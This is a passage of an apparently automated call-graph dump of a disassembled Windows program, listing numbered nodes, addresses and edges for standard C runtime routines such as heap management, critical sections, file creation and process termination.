9111->9113 9113->9111 9115->9111 9119 4087a1 LeaveCriticalSection 9116->9119 9118 404723 9119->9118 9611 4098d1 9612 4098ea 9611->9612 9613 409908 9611->9613 9612->9613 9614 406e45 2 API calls 9612->9614 9615 406ef9 30 API calls 9612->9615 9614->9612 9615->9612 9616 4016d1 9619 404aca 9616->9619 9622 404b36 9619->9622 9625 40486c 9622->9625 9626 404878 ___scrt_is_nonwritable_in_current_image 9625->9626 9633 408759 EnterCriticalSection 9626->9633 9628 404886 9634 4048c7 9628->9634 9630 404893 9644 4048bb 9630->9644 9633->9628 9635 4048e3 9634->9635 9637 40495a __dosmaperr 9634->9637 9636 40493a 9635->9636 9635->9637 9647 409852 9635->9647 9636->9637 9639 409852 28 API calls 9636->9639 9637->9630 9641 404950 9639->9641 9640 404930 9643 406fe2 _free 14 API calls 9640->9643 9642 406fe2 _free 14 API calls 9641->9642 9642->9637 9643->9636 9675 4087a1 LeaveCriticalSection 9644->9675 9646 4016d9 9648 40987a 9647->9648 9649 40985f 9647->9649 9651 409889 9648->9651 9656 40c558 9648->9656 9649->9648 9650 40986b 9649->9650 9652 40514f __dosmaperr 14 API calls 9650->9652 9663 40c58b 9651->9663 9655 409870 __fread_nolock 9652->9655 9655->9640 9657 40c563 9656->9657 9658 40c578 HeapSize 9656->9658 9659 40514f __dosmaperr 14 API calls 9657->9659 9658->9651 9660 40c568 9659->9660 9661 40506e __wsopen_s 25 API calls 9660->9661 9662 40c573 9661->9662 9662->9651 9664 40c5a3 9663->9664 9665 40c598 9663->9665 9667 40c5ab 9664->9667 9673 40c5b4 __dosmaperr 9664->9673 9666 408ea0 __fread_nolock 15 API calls 9665->9666 9671 40c5a0 9666->9671 9668 406fe2 _free 14 API calls 9667->9668 9668->9671 9669 40c5b9 9672 40514f __dosmaperr 14 API calls 9669->9672 9670 40c5de HeapReAlloc 9670->9671 9670->9673 9671->9655 9672->9671 9673->9669 9673->9670 9674 409982 __dosmaperr 2 API calls 9673->9674 9674->9673 9675->9646 9304 405367 9305 405372 9304->9305 9306 405382 9304->9306 9310 405388 9305->9310 9309 406fe2 _free 14 API calls 9309->9306 9311 4053a3 9310->9311 9312 40539d 9310->9312 9314 406fe2 _free 14 API calls 9311->9314 9313 406fe2 _free 14 API calls 9312->9313 9313->9311 9315 4053af 9314->9315 9316 406fe2 _free 14 API calls 9315->9316 9317 4053ba 9316->9317 9318 406fe2 _free 14 API calls 9317->9318 9319 4053c5 9318->9319 9320 406fe2 _free 14 API calls 9319->9320 9321 4053d0 9320->9321 9322 406fe2 _free 14 API calls 9321->9322 9323 4053db 9322->9323 9324 406fe2 _free 14 API calls 9323->9324 9325 4053e6 9324->9325 9326 406fe2 _free 14 API calls 9325->9326 9327 4053f1 9326->9327 9328 406fe2 _free 14 API calls 9327->9328 9329 4053fc 9328->9329 9330 406fe2 _free 14 API calls 9329->9330 9331 40540a 9330->9331 9336 4051b4 9331->9336 9337 4051c0 ___scrt_is_nonwritable_in_current_image 9336->9337 9352 408759 EnterCriticalSection 9337->9352 9339 4051f4 9353 405213 9339->9353 9341 4051ca 9341->9339 9343 406fe2 _free 14 API calls 9341->9343 9343->9339 9344 40521f 9345 40522b ___scrt_is_nonwritable_in_current_image 9344->9345 9357 408759 EnterCriticalSection 9345->9357 9347 405235 9348 405455 __dosmaperr 14 API calls 9347->9348 9349 405248 9348->9349 9358 405268 9349->9358 9352->9341 9356 4087a1 LeaveCriticalSection 9353->9356 9355 405201 9355->9344 9356->9355 9357->9347 9361 4087a1 LeaveCriticalSection 9358->9361 9360 405256 9360->9309 9361->9360 9395 405814 9405 406d86 9395->9405 9399 405821 9418 40a36f 9399->9418 9402 40584b 9403 406fe2 _free 14 API calls 9402->9403 9404 405856 9403->9404 9422 406c34 9405->9422 9408 40a2c4 9409 40a2d0 ___scrt_is_nonwritable_in_current_image 9408->9409 9491 408759 EnterCriticalSection 9409->9491 9411 40a2db 9412 40a347 9411->9412 9415 40a31b DeleteCriticalSection 9411->9415 9492 40c94f 9411->9492 9505 40a366 9412->9505 9416 406fe2 _free 14 API calls 9415->9416 9416->9411 9419 40a386 9418->9419 9420 405830 DeleteCriticalSection 9418->9420 9419->9420 9421 406fe2 _free 14 API calls 9419->9421 9420->9399 9420->9402 9421->9420 9425 406b88 9422->9425 9426 406b94 ___scrt_is_nonwritable_in_current_image 9425->9426 9433 408759 EnterCriticalSection 9426->9433 9428 406b9e ___scrt_uninitialize_crt 9429 406c0a 9428->9429 9434 406afc 9428->9434 9442 406c28 9429->9442 9433->9428 9435 406b08 ___scrt_is_nonwritable_in_current_image 9434->9435 9445 405860 EnterCriticalSection 9435->9445 9437 406b12 ___scrt_uninitialize_crt 9438 406b4b 9437->9438 9446 406d3e 9437->9446 9456 406b7c 9438->9456 9490 4087a1 LeaveCriticalSection 9442->9490 9444 40581c 9444->9408 9445->9437 9447 406d54 9446->9447 9448 406d4b 9446->9448 9450 406cd9 ___scrt_uninitialize_crt 62 API calls 9447->9450 9449 406c34 ___scrt_uninitialize_crt 66 API calls 9448->9449 9452 406d51 9449->9452 9451 406d5a 9450->9451 9451->9452 9453 405dba __fread_nolock 25 API calls 9451->9453 9452->9438 9454 406d70 9453->9454 9459 40b00a 9454->9459 9489 405874 LeaveCriticalSection 9456->9489 9458 406b6a 9458->9428 9460 40b028 9459->9460 9461 40b01b 9459->9461 9463 40b071 9460->9463 9467 40b04f 9460->9467 9462 40514f __dosmaperr 14 API calls 9461->9462 9465 40b020 9462->9465 9464 40514f __dosmaperr 14 API calls 9463->9464 9466 40b076 9464->9466 9465->9452 9468 40506e __wsopen_s 25 API calls 9466->9468 9470 40af68 9467->9470 9468->9465 9471 40af74 ___scrt_is_nonwritable_in_current_image 9470->9471 9484 408937 EnterCriticalSection 9471->9484 9473 40af83 9474 40afca 9473->9474 9475 408bb3 __wsopen_s 25 API calls 9473->9475 9476 40514f __dosmaperr 14 API calls 9474->9476 9477 40afaf FlushFileBuffers 9475->9477 9478 40afcf 9476->9478 9477->9478 9479 40afbb 9477->9479 9485 40affe 9478->9485 9481 40513c __dosmaperr 14 API calls 9479->9481 9483 40afc0 GetLastError 9481->9483 9483->9474 9484->9473 9488 4089ec LeaveCriticalSection 9485->9488 9487 40afe7 9487->9465 9488->9487 9489->9458 9490->9444 9491->9411 9493 40c95b ___scrt_is_nonwritable_in_current_image 9492->9493 9494 40c965 9493->9494 9495 40c97a 9493->9495 9496 40514f __dosmaperr 14 API calls 9494->9496 9497 40c975 9495->9497 9508 405860 EnterCriticalSection 9495->9508 9498 40c96a 9496->9498 9497->9411 9500 40506e __wsopen_s 25 API calls 9498->9500 9500->9497 9501 40c997 9509 40c8d8 9501->9509 9503 40c9a2 9525 40c9c9 9503->9525 9560 4087a1 LeaveCriticalSection 9505->9560 9507 40a353 9507->9399 9508->9501 9510 40c8e5 9509->9510 9511 40c8fa 9509->9511 9512 40514f __dosmaperr 14 API calls 9510->9512 9514 406cd9 ___scrt_uninitialize_crt 62 API calls 9511->9514 9517 40c8f5 9511->9517 9513 40c8ea 9512->9513 9515 40506e __wsopen_s 25 API calls 9513->9515 9516 40c90f 9514->9516 9515->9517 9518 40a36f 14 API calls 9516->9518 9517->9503 9519 40c917 9518->9519 9520 405dba __fread_nolock 25 API calls 9519->9520 9521 40c91d 9520->9521 9528 40cc8a 9521->9528 9524 406fe2 _free 14 API calls 9524->9517 9559 405874 LeaveCriticalSection 9525->9559 9527 40c9d1 9527->9497 9529 40ccb0 9528->9529 9530 40cc9b 9528->9530 9531 40ccf9 9529->9531 9535 40ccd7 9529->9535 9532 40513c __dosmaperr 14 API calls 9530->9532 9533 40513c __dosmaperr 14 API calls 9531->9533 9534 40cca0 9532->9534 9536 40ccfe 9533->9536 9537 40514f __dosmaperr 14 API calls 9534->9537 9543 40cbfe 9535->9543 9539 40514f __dosmaperr 14 API calls 9536->9539 9540 40c923 9537->9540 9541 40cd06 9539->9541 9540->9517 9540->9524 9542 40506e __wsopen_s 25 API calls 9541->9542 9542->9540 9544 40cc0a ___scrt_is_nonwritable_in_current_image 9543->9544 9554 408937 EnterCriticalSection 9544->9554 9546 40cc18 9547 40cc4a 9546->9547 9548 40cc3f 9546->9548 9550 40514f __dosmaperr 14 API calls 9547->9550 9549 40cd17 __wsopen_s 28 API calls 9548->9549 9551 40cc45 9549->9551 9550->9551 9555 40cc7e 9551->9555 9554->9546 9558 4089ec LeaveCriticalSection 9555->9558 9557 40cc67 9557->9540 9558->9557 9559->9527 9560->9507 7162 405c18 7167 4059ee 7162->7167 7165 405c57 7168 405a0d 7167->7168 7169 405a20 7168->7169 7177 405a35 7168->7177 7187 40514f 7169->7187 7173 405a30 7173->7165 7184 40ab6f 7173->7184 7174 40514f __dosmaperr 14 API calls 7175 405c06 7174->7175 7176 40506e __wsopen_s 25 API calls 7175->7176 7176->7173 7182 405b55 7177->7182 7193 40a3fe 7177->7193 7179 405ba5 7180 40a3fe 37 API calls 7179->7180 7179->7182 7181 405bc3 7180->7181 7181->7182 7183 40a3fe 37 API calls 7181->7183 7182->7173 7182->7174 7183->7182 7668 40a534 7184->7668 7207 4055f7 GetLastError 7187->7207 7189 405154 7190 40506e 7189->7190 7427 40500a 7190->7427 7192 40507a 7192->7173 7194 40a455 7193->7194 7195 40a40d 7193->7195 7453 40a46b 7194->7453 7197 40a413 7195->7197 7198 40a430 7195->7198 7199 40514f __dosmaperr 14 API calls 7197->7199 7203 40514f __dosmaperr 14 API calls 7198->7203 7206 40a44e 7198->7206 7200 40a418 7199->7200 7202 40506e __wsopen_s 25 API calls 7200->7202 7201 40a423 7201->7179 7202->7201 7204 40a43f 7203->7204 7205 40506e __wsopen_s 25 API calls 7204->7205 7205->7201 7206->7179 7208 40560e 7207->7208 7212 405614 7207->7212 7230 409697 7208->7230 7229 40561a SetLastError 7212->7229 7235 4096d6 7212->7235 7216 405661 7219 4096d6 __dosmaperr 6 API calls 7216->7219 7217 40564a 7218 4096d6 __dosmaperr 6 API calls 7217->7218 7220 405658 7218->7220 7221 40566d 7219->7221 7247 406fe2 7220->7247 7222 405671 7221->7222 7223 405682 7221->7223 7226 4096d6 __dosmaperr 6 API calls 7222->7226 7253 4052ce 7223->7253 7226->7220 7228 406fe2 _free 12 API calls 7228->7229 7229->7189 7258 4094da 7230->7258 7232 4096b3 7233 4096ce TlsGetValue 7232->7233 7234 4096bc 7232->7234 7234->7212 7236 4094da __dosmaperr 5 API calls 7235->7236 7237 4096f2 7236->7237 7238 409710 TlsSetValue 7237->7238 7239 405632 7237->7239 7239->7229 7240 406f85 7239->7240 7241 406f92 __dosmaperr 7240->7241 7242 406fd2 7241->7242 7243 406fbd RtlAllocateHeap 7241->7243 7271 409982 7241->7271 7244 40514f __dosmaperr 13 API calls 7242->7244 7243->7241 7245 405642 7243->7245 7244->7245 7245->7216 7245->7217 7248 406fed HeapFree 7247->7248 7252 407016 __dosmaperr 7247->7252 7249 407002 7248->7249 7248->7252 7250 40514f __dosmaperr 12 API calls 7249->7250 7251 407008 GetLastError 7250->7251 7251->7252 7252->7229 7285 405162 7253->7285 7259 409508 7258->7259 7263 409504 __dosmaperr 7258->7263 7259->7263 7264 409413 7259->7264 7262 409522 GetProcAddress 7262->7263 7263->7232 7269 409424 ___vcrt_FlsFree 7264->7269 7265 409442 LoadLibraryExW 7267 40945d GetLastError 7265->7267 7265->7269 7266 4094cf 7266->7262 7266->7263 7267->7269 7268 4094b8 FreeLibrary 7268->7269 7269->7265 7269->7266 7269->7268 7270 409490 LoadLibraryExW 7269->7270 7270->7269 7274 4099af 7271->7274 7275 4099bb ___scrt_is_nonwritable_in_current_image 7274->7275 7280 408759 EnterCriticalSection 7275->7280 7277 4099c6 7281 409a02 7277->7281 7280->7277 7284 4087a1 LeaveCriticalSection 7281->7284 7283 40998d 7283->7241 7284->7283 7286 40516e ___scrt_is_nonwritable_in_current_image 7285->7286 7299 408759 EnterCriticalSection 7286->7299 7288 405178 7300 4051a8 7288->7300 7291 405274 7292 405280 ___scrt_is_nonwritable_in_current_image 7291->7292 7304 408759 EnterCriticalSection 7292->7304 7294 40528a 7305 405455 7294->7305 7296 4052a2 7309 4052c2 7296->7309 7299->7288 7303 4087a1 LeaveCriticalSection 7300->7303 7302 405196 7302->7291 7303->7302 7304->7294 7306 40548b __fassign 7305->7306 7307 405464 __fassign 7305->7307 7306->7296 7307->7306 7312 40908e 7307->7312 7426 4087a1 LeaveCriticalSection 7309->7426 7311 4052b0 7311->7228 7313 40910e 7312->7313 7316 4090a4 7312->7316 7315 406fe2 _free 14 API calls 7313->7315 7337 40915c 7313->7337 7317 409130 7315->7317 7316->7313 7319 406fe2 _free 14 API calls 7316->7319 7333 4090d7 7316->7333 7318 406fe2 _free 14 API calls 7317->7318 7320 409143 7318->7320 7323 4090cc 7319->7323 7324 406fe2 _free 14 API calls 7320->7324 7321 406fe2 _free 14 API calls 7326 409103 7321->7326 7322 4091ca 7327 406fe2 _free 14 API calls 7322->7327 7340 408c1d 7323->7340 7329 409151 7324->7329 7325 406fe2 _free 14 API calls 7330 4090ee 7325->7330 7331 406fe2 _free 14 API calls 7326->7331 7332 4091d0 7327->7332 7334 406fe2 _free 14 API calls 7329->7334 7368 408d1b 7330->7368 7331->7313 7332->7306 7333->7325 7338 4090f9 7333->7338 7334->7337 7336 406fe2 14 API calls _free 7339 40916a 7336->7339 7380 4091ff 7337->7380 7338->7321 7339->7322 7339->7336 7341 408c2e 7340->7341 7367 408d17 7340->7367 7342 406fe2 _free 14 API calls 7341->7342 7345 408c3f 7341->7345 7342->7345 7343 406fe2 _free 14 API calls 7344 408c51 7343->7344 7346 406fe2 _free 14 API calls 7344->7346 7348 408c63 7344->7348 7345->7343 7345->7344 7346->7348 7347 408c75 7350 408c87 7347->7350 7352 406fe2 _free 14 API calls 7347->7352 7348->7347 7349 406fe2 _free 14 API calls 7348->7349 7349->7347 7351 408c99 7350->7351 7353 406fe2 _free 14 API calls 7350->7353 7354 408cab 7351->7354 7355 406fe2 _free 14 API calls 7351->7355 7352->7350 7353->7351 7356 408cbd 7354->7356 7357 406fe2 _free 14 API calls 7354->7357 7355->7354 7358 408ccf 7356->7358 7360 406fe2 _free 14 API calls 7356->7360 7357->7356 7359 408ce1 7358->7359 7361 406fe2 _free 14 API calls 7358->7361 7362 408cf3 7359->7362 7363 406fe2 _free 14 API calls 7359->7363 7360->7358 7361->7359 7364 408d05 7362->7364 7365 406fe2 _free 14 API calls 7362->7365 7363->7362 7366 406fe2 _free 14 API calls 7364->7366 7364->7367 7365->7364 7366->7367 7367->7333 7369 408d28 7368->7369 7379 408d80 7368->7379 7370 408d38 7369->7370 7371 406fe2 _free 14 API calls 7369->7371 7372 408d4a 7370->7372 7373 406fe2 _free 14 API calls 7370->7373 7371->7370 7374 408d5c 7372->7374 7375 406fe2 _free 14 API calls 7372->7375 7373->7372 7376 408d6e 7374->7376 7377 406fe2 _free 14 API calls 7374->7377 7375->7374 7378 406fe2 _free 14 API calls 7376->7378 7376->7379 7377->7376 7378->7379 7379->7338 7381 40920c 7380->7381 7385 40922b 7380->7385 7381->7385 7386 408dbc 7381->7386 7384 406fe2 _free 14 API calls 7384->7385 7385->7339 7387 408e9a 7386->7387 7388 408dcd 7386->7388 7387->7384 7422 408d84 7388->7422 7391 408d84 __fassign 14 API calls 7392 408de0 7391->7392 7393 408d84 __fassign 14 API calls 7392->7393 7394 408deb 7393->7394 7395 408d84 __fassign 14 API calls 7394->7395 7396 408df6 7395->7396 7397 408d84 __fassign 14 API calls 7396->7397 7398 408e04 7397->7398 7399 406fe2 _free 14 API calls 7398->7399 7400 408e0f 7399->7400 7401 406fe2 _free 14 API calls 7400->7401 7402 408e1a 7401->7402 7403 406fe2 _free 14 API calls 7402->7403 7404 408e25 7403->7404 7405 408d84 __fassign 14 API calls 7404->7405 7406 408e33 7405->7406 7407 408d84 __fassign 14 API calls 7406->7407 7408 408e41 7407->7408 7409 408d84 __fassign 14 API calls 7408->7409 7410 408e52 7409->7410 7411 408d84 __fassign 14 API calls 7410->7411 7412 408e60 7411->7412 7413 408d84 __fassign 14 API calls 7412->7413 7414 408e6e 7413->7414 7415 406fe2 _free 14 API calls 7414->7415 7416 408e79 7415->7416 7417 406fe2 _free 14 API calls 7416->7417 7418 408e84 7417->7418 7419 406fe2 _free 14 API calls 7418->7419 7420 408e8f 7419->7420 7421 406fe2 _free 14 API calls 7420->7421 7421->7387 7423 408db7 7422->7423 7424 408da7 7422->7424 7423->7391 7424->7423 7425 406fe2 _free 14 API calls 7424->7425 7425->7424 7426->7311 7428 4055f7 __dosmaperr 14 API calls 7427->7428 7429 405015 7428->7429 7430 405023 7429->7430 7435 40507e IsProcessorFeaturePresent 7429->7435 7430->7192 7432 40506d 7433 40500a __wsopen_s 25 API calls 7432->7433 7434 40507a 7433->7434 7434->7192 7436 40508a 7435->7436 7439 404ec2 7436->7439 7440 404ede __fread_nolock __fassign 7439->7440 7441 404f0a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7440->7441 7444 404fdb __fassign 7441->7444 7443 404ff9 GetCurrentProcess TerminateProcess 7443->7432 7445 401c75 7444->7445 7446 401c7d 7445->7446 7447 401c7e IsProcessorFeaturePresent 7445->7447 7446->7443 7449 401cc0 7447->7449 7452 401c83 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7449->7452 7451 401da3 7451->7443 7452->7451 7454 40a495 7453->7454 7455 40a47b 7453->7455 7456 40a4b4 7454->7456 7457 40a49d 7454->7457 7458 40514f __dosmaperr 14 API calls 7455->7458 7460 40a4c0 7456->7460 7461 40a4d7 7456->7461 7459 40514f __dosmaperr 14 API calls 7457->7459 7462 40a480 7458->7462 7463 40a4a2 7459->7463 7464 40514f __dosmaperr 14 API calls 7460->7464 7469 40a48b 7461->7469 7471 402ce0 7461->7471 7465 40506e __wsopen_s 25 API calls 7462->7465 7467 40506e __wsopen_s 25 API calls 7463->7467 7468 40a4c5 7464->7468 7465->7469 7467->7469 7470 40506e __wsopen_s 25 API calls 7468->7470 7469->7201 7470->7469 7472 402d00 7471->7472 7473 402cf7 7471->7473 7472->7473 7479 4054a0 GetLastError 7472->7479 7473->7469 7480 4054bd 7479->7480 7481 4054b7 7479->7481 7482 4096d6 __dosmaperr 6 API calls 7480->7482 7505 4054c3 SetLastError 7480->7505 7483 409697 __dosmaperr 6 API calls 7481->7483 7484 4054db 7482->7484 7483->7480 7485 406f85 __dosmaperr 14 API calls 7484->7485 7484->7505 7486 4054eb 7485->7486 7488 4054f3 7486->7488 7489 40550a 7486->7489 7492 4096d6 __dosmaperr 6 API calls 7488->7492 7494 4096d6 __dosmaperr 6 API calls 7489->7494 7490 402d20 7506 4056f2 7490->7506 7491 405557 7514 404db6 7491->7514 7495 405501 7492->7495 7497 405516 7494->7497 7502 406fe2 _free 14 API calls 7495->7502 7498 40551a 7497->7498 7499 40552b 7497->7499 7500 4096d6 __dosmaperr 6 API calls 7498->7500 7501 4052ce __dosmaperr 14 API calls 7499->7501 7500->7495 7503 405536 7501->7503 7502->7505 7504 406fe2 _free 14 API calls 7503->7504 7504->7505 7505->7490 7505->7491 7507 405705 7506->7507 7508 402d36 7506->7508 7507->7508 7625 4092da 7507->7625 7510 40571f 7508->7510 7511 405732 7510->7511 7512 405747 7510->7512 7511->7512 7647 407f57 7511->7647 7512->7473 7525 409ad9 7514->7525 7517 404dc6 7519 404dd0 IsProcessorFeaturePresent 7517->7519 7520 404def 7517->7520 7521 404ddc 7519->7521 7555 404523 7520->7555 7523 404ec2 __fassign 8 API calls 7521->7523 7523->7520 7558 409a0b 7525->7558 7528 409b27 7529 409b33 ___scrt_is_nonwritable_in_current_image 7528->7529 7530 4055f7 __dosmaperr 14 API calls 7529->7530 7534 409b60 __fassign 7529->7534 7535 409b5a __fassign 7529->7535 7530->7535 7531 409ba5 7532 40514f __dosmaperr 14 API calls 7531->7532 7533 409baa 7532->7533 7536 40506e __wsopen_s 25 API calls 7533->7536 7538 409bd1 7534->7538 7569 408759 EnterCriticalSection 7534->7569 7535->7531 7535->7534 7554 409b8f 7535->7554 7536->7554 7540 409c19 7538->7540 7541 409d0e 7538->7541 7551 409c44 7538->7551 7540->7551 7570 409b1e 7540->7570 7543 409d19 7541->7543 7577 4087a1 LeaveCriticalSection 7541->7577 7544 404523 __fassign 23 API calls 7543->7544 7546 409d21 7544->7546 7548 4054a0 __fassign 37 API calls 7552 409c98 7548->7552 7550 409b1e __fassign 37 API calls 7550->7551 7573 409cba 7551->7573 7553 4054a0 __fassign 37 API calls 7552->7553 7552->7554 7553->7554 7554->7517 7579 4043ba 7555->7579 7559 409a17 ___scrt_is_nonwritable_in_current_image 7558->7559 7564 408759 EnterCriticalSection 7559->7564 7561 409a25 7565 409a63 7561->7565 7564->7561 7568 4087a1 LeaveCriticalSection 7565->7568 7567 404dbb 7567->7517 7567->7528 7568->7567 7569->7538 7571 4054a0 __fassign 37 API calls 7570->7571 7572 409b23 7571->7572 7572->7550 7574 409cc0 7573->7574 7575 409c89 7573->7575 7578 4087a1 LeaveCriticalSection 7574->7578 7575->7548 7575->7552 7575->7554 7577->7543 7578->7575 7580 4043c8 7579->7580 7581 4043d9 7579->7581 7590 404460 GetModuleHandleW 7580->7590 7597 404280 7581->7597 7586 404413 7591 4043cd 7590->7591 7591->7581 7592 4044a3 GetModuleHandleExW 7591->7592 7593 4044c2 GetProcAddress 7592->7593 7594 4044d7 7592->7594 7593->7594 7595 4044f4 7594->7595 7596 4044eb FreeLibrary 7594->7596 7595->7581 7596->7595 7598 40428c ___scrt_is_nonwritable_in_current_image 7597->7598 7613 408759 EnterCriticalSection 7598->7613 7600 404296 7614 4042cd 7600->7614 7602 4042a3 7618 4042c1 7602->7618 7605 40441e 7621 4087b8 GetPEB 7605->7621 7608 40444d 7611 4044a3 __fassign 3 API calls 7608->7611 7609 40442d GetPEB 7609->7608 7610 40443d GetCurrentProcess TerminateProcess 7609->7610 7610->7608 7612 404455 ExitProcess 7611->7612 7613->7600 7615 4042d9 ___scrt_is_nonwritable_in_current_image 7614->7615 7616 404ae0 __fassign 14 API calls 7615->7616 7617 40433a __fassign 7615->7617 7616->7617 7617->7602 7619 4087a1 ___scrt_uninitialize_crt LeaveCriticalSection 7618->7619 7620 4042af 7619->7620 7620->7586 7620->7605 7622 404428 7621->7622 7623 4087d2 7621->7623 7622->7608 7622->7609 7624 40955d __fassign 5 API calls 7623->7624 7624->7622 7626 4092e6 ___scrt_is_nonwritable_in_current_image 7625->7626 7627 4054a0 __fassign 37 API calls 7626->7627 7628 4092ef 7627->7628 7629 409335 7628->7629 7638 408759 EnterCriticalSection 7628->7638 7629->7508 7631 40930d 7639 40935b 7631->7639 7636 404db6 __fassign 37 API calls 7637 40935a 7636->7637 7638->7631 7640 40931e 7639->7640 7641 409369 __fassign 7639->7641 7643 40933a 7640->7643 7641->7640 7642 40908e __fassign 14 API calls 7641->7642 7642->7640 7646 4087a1 LeaveCriticalSection 7643->7646 7645 409331 7645->7629 7645->7636 7646->7645 7648 4054a0 __fassign 37 API calls 7647->7648 7649 407f61 7648->7649 7652 407e6f 7649->7652 7653 407e7b ___scrt_is_nonwritable_in_current_image 7652->7653 7654 407e95 7653->7654 7663 408759 EnterCriticalSection 7653->7663 7657 407e9c 7654->7657 7659 404db6 __fassign 37 API calls 7654->7659 7656 407ed1 7664 407eee 7656->7664 7657->7512 7661 407f0e 7659->7661 7660 407ea5 7660->7656 7662 406fe2 _free 14 API calls 7660->7662 7662->7656 7663->7660 7667 4087a1 LeaveCriticalSection 7664->7667 7666 407ef5 7666->7654 7667->7666 7671 40a540 ___scrt_is_nonwritable_in_current_image 7668->7671 7669 40a547 7670 40514f __dosmaperr 14 API calls 7669->7670 7672 40a54c 7670->7672 7671->7669 7673 40a572 7671->7673 7674 40506e __wsopen_s 25 API calls 7672->7674 7679 40ab01 7673->7679 7678 40a556 7674->7678 7678->7165 7692 4076c9 7679->7692 7684 40ab37 7686 40a596 7684->7686 7687 406fe2 _free 14 API calls 7684->7687 7688 40a5c9 7686->7688 7687->7686 7689 40a5cf 7688->7689 7691 40a5f3 7688->7691 8248 4089ec LeaveCriticalSection 7689->8248 7691->7678 7693 402ce0 __fassign 37 API calls 7692->7693 7694 4076db 7693->7694 7696 4076ed 7694->7696 7747 40959d 7694->7747 7697 4071b5 7696->7697 7753 407034 7697->7753 7700 40ab8f 7801 40a8dd 7700->7801 7703 40abc1 7705 40513c __dosmaperr 14 API calls 7703->7705 7704 40abda 7819 408a0f 7704->7819 7707 40abc6 7705->7707 7711 40514f __dosmaperr 14 API calls 7707->7711 7709 40abe8 7712 40513c __dosmaperr 14 API calls 7709->7712 7710 40abff 7832 40a848 CreateFileW 7710->7832 7714 40abd3 7711->7714 7715 40abed 7712->7715 7714->7684 7717 40514f __dosmaperr 14 API calls 7715->7717 7716 40acb5 GetFileType 7719 40acc0 GetLastError 7716->7719 7720 40ad07 7716->7720 7717->7707 7718 40ac8a GetLastError 7722 405119 __dosmaperr 14 API calls 7718->7722 7723 405119 __dosmaperr 14 API calls 7719->7723 7834 40895a 7720->7834 7721 40ac38 7721->7716 7721->7718 7833 40a848 CreateFileW 7721->7833 7722->7707 7725 40acce CloseHandle 7723->7725 7725->7707 7728 40acf7 7725->7728 7727 40ac7d 7727->7716 7727->7718 7730 40514f __dosmaperr 14 API calls 7728->7730 7732 40acfc 7730->7732 7731 40ad74 7736 40ad7b 7731->7736 7873 40a5f5 7731->7873 7732->7707 7858 40cd17 7736->7858 7737 40adb7 7737->7714 7739 40ae33 CloseHandle 7737->7739 7899 40a848 CreateFileW 7739->7899 7741 40ae5e 7742 40ae68 GetLastError 7741->7742 7743 40ad82 7741->7743 7744 405119 __dosmaperr 14 API calls 7742->7744 7743->7714 7745 40ae74 7744->7745 7900 408b22 7745->7900 7750 4093ab 7747->7750 7751 4094da __dosmaperr 5 API calls 7750->7751 7752 4093c1 7751->7752 7752->7696 7754 407042 7753->7754 7755 40705c 7753->7755 7771 407708 7754->7771 7757 407082 7755->7757 7758 407063 7755->7758 7780 4081cc 7757->7780 7762 40704c 7758->7762 7775 40775e 7758->7775 7761 407091 7763 407098 GetLastError 7761->7763 7765 4070be 7761->7765 7768 40775e __wsopen_s 15 API calls 7761->7768 7762->7684 7762->7700 7783 405119 7763->7783 7765->7762 7766 4081cc __fassign MultiByteToWideChar 7765->7766 7769 4070d5 7766->7769 7768->7765 7769->7762 7769->7763 7770 40514f __dosmaperr 14 API calls 7770->7762 7772 40771b 7771->7772 7773 407713 7771->7773 7772->7762 7774 406fe2 _free 14 API calls 7773->7774 7774->7772 7776 407708 __wsopen_s 14 API calls 7775->7776 7777 40776c 7776->7777 7788 40779d 7777->7788 7781 4081dd MultiByteToWideChar 7780->7781 7781->7761 7798 40513c 7783->7798 7785 405124 __dosmaperr 7786 40514f __dosmaperr 14 API calls 7785->7786 7787 405137 7786->7787 7787->7770 7791 408ea0 7788->7791 7792 408ede 7791->7792 7793 408eae __dosmaperr 7791->7793 7795 40514f __dosmaperr 14 API calls 7792->7795 7793->7792 7794 408ec9 HeapAlloc 7793->7794 7797 409982 __dosmaperr 2 API calls 7793->7797 7794->7793 7796 40777d 7794->7796 7795->7796 7796->7762 7797->7793 7799 4055f7 __dosmaperr 14 API calls 7798->7799 7800 405141 7799->7800 7800->7785 7802 40a918 7801->7802 7803 40a8fe 7801->7803 7909 40a86d 7802->7909 7803->7802 7805 40514f __dosmaperr 14 API calls 7803->7805 7806 40a90d 7805->7806 7807 40506e __wsopen_s 25 API calls 7806->7807 7807->7802 7808 40a950 7809 40a97f 7808->7809 7811 40514f __dosmaperr 14 API calls 7808->7811 7812 40a9d2 7809->7812 7916 404575 7809->7916 7814 40a974 7811->7814 7812->7703 7812->7704 7813 40a9cd 7813->7812 7815 40aa4a 7813->7815 7816 40506e __wsopen_s 25 API calls 7814->7816 7817 40507e __wsopen_s 11 API calls 7815->7817 7816->7809 7818 40aa56 7817->7818 7820 408a1b ___scrt_is_nonwritable_in_current_image 7819->7820 7923 408759 EnterCriticalSection 7820->7923 7822 408a69 7924 408b19 7822->7924 7824 408a47 7927 4087e9 7824->7927 7827 408a22 7827->7822 7827->7824 7829 408ab6 EnterCriticalSection 7827->7829 7829->7822 7830 408ac3 LeaveCriticalSection 7829->7830 7830->7827 7832->7721 7833->7727 7835 4089d2 7834->7835 7836 408969 7834->7836 7837 40514f __dosmaperr 14 API calls 7835->7837 7836->7835 7842 40898f __wsopen_s 7836->7842 7838 4089d7 7837->7838 7839 40513c __dosmaperr 14 API calls 7838->7839 7840 4089bf 7839->7840 7840->7731 7843 40aa57 7840->7843 7841 4089b9 SetStdHandle 7841->7840 7842->7840 7842->7841 7844 40aa7f 7843->7844 7845 40aab1 7843->7845 7844->7845 7941 406ae1 7844->7941 7845->7731 7848 40aab5 7944 4063f9 7848->7944 7849 40aa9f 7850 40513c __dosmaperr 14 API calls 7849->7850 7852 40aaa4 7850->7852 7852->7845 7856 40514f __dosmaperr 14 API calls 7852->7856 7854 40aadd 7854->7852 7855 406ae1 __fread_nolock 27 API calls 7854->7855 7855->7852 7856->7845 7859 408bb3 __wsopen_s 25 API calls 7858->7859 7862 40cd27 7859->7862 7860 40cd2d 7861 408b22 __wsopen_s 15 API calls 7860->7861 7864 40cd85 7861->7864 7862->7860 7863 40cd5f 7862->7863 7865 408bb3 __wsopen_s 25 API calls 7862->7865 7863->7860 7866 408bb3 __wsopen_s 25 API calls 7863->7866 7867 40cda7 7864->7867 7871 405119 __dosmaperr 14 API calls 7864->7871 7868 40cd56 7865->7868 7869 40cd6b CloseHandle 7866->7869 7867->7743 7872 408bb3 